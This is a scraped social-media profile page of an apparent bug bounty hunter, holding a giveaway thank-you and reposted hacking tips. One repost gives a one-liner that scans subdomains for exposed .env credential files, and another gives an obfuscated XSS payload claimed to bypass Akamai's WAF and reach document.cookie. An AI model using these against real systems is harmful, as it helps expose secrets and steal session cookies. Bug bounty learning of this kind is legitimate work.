sajusec's profile picture. Hack the planet @sajusec

MD SAJJAD HOSSAIN

@sajusec

Hack the planet @sajusec

Thanks @Bugcrowd for the ITMOAH GIVE WAY sometimes it's not about bug it's about luck boys🤧🤧

sajusec's tweet image. Thanks @Bugcrowd  for the ITMOAH GIVE WAY 
sometimes it's not about bug it's about luck boys🤧🤧

MD SAJJAD HOSSAIN reposted

✅Bug Bounty Tips 🐞403 bypass methodology🐞 #bugbounty #bugbountytips #infosec #CyberSecurity

viehgroup's tweet image. ✅Bug Bounty Tips
🐞403 bypass methodology🐞

 #bugbounty #bugbountytips #infosec #CyberSecurity

MD SAJJAD HOSSAIN reposted

Post 7/30 : .env 1. Gather a list of subdomains sub finder -d <target>.tld -o subdomains.txt 2. then you can use this One-liner while read host; do echo "$host/.env" done < subdomains.txt | httpx -mc 200 It will find the accessible .env file

h4x0r_fr34k's tweet image. Post 7/30 : .env 

1. Gather a list of subdomains
sub finder -d &amp;lt;target&amp;gt;.tld -o subdomains.txt 

2.  then you can use this One-liner 

while read host; do
  echo &quot;$host/.env&quot;
done &amp;lt; subdomains.txt | httpx -mc 200

It will find the accessible .env file
h4x0r_fr34k's tweet image. Post 7/30 : .env 

1. Gather a list of subdomains
sub finder -d &amp;lt;target&amp;gt;.tld -o subdomains.txt 

2.  then you can use this One-liner 

while read host; do
  echo &quot;$host/.env&quot;
done &amp;lt; subdomains.txt | httpx -mc 200

It will find the accessible .env file

MD SAJJAD HOSSAIN reposted

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #BugBounty #XSS #bugbountytips

viehgroup's tweet image. Cross Site Scripting (XSS) Akamai WAF Bypass

try this payload :
&amp;lt;!--&amp;gt;&amp;lt;svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27&amp;gt;

#BugBounty #XSS #bugbountytips

United States Trends

Loading...

Something went wrong.


Something went wrong.